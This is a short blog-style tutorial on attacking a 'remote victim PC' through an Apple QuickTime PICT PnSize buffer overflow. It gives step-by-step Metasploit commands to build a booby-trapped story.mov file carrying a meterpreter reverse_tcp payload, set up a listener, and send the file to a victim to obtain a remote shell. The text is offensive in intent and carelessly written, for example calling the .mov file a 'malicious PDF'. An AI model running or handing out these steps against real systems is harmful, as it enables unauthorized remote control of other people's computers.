Attacking on Remote Victim PC using Apple QuickTime PICT PnSize Buffer Overflow

This module exploits vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Exploit Targets

Apple QuickTime Player 7.6

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/apple_quicktime­_pnsize

Msf exploit (apple_quicktime­_pnsize)>set payload windows/meterpreter/reverse_tcp

Msf exploit (apple_quicktime­_pnsize)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (apple_quicktime­_pnsize)>set filename story.mov

Msf exploit (apple_quicktime­_pnsize)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/story.mov

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your story.mov files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Leave a Reply

Your email address will not be published. Required fields are marked *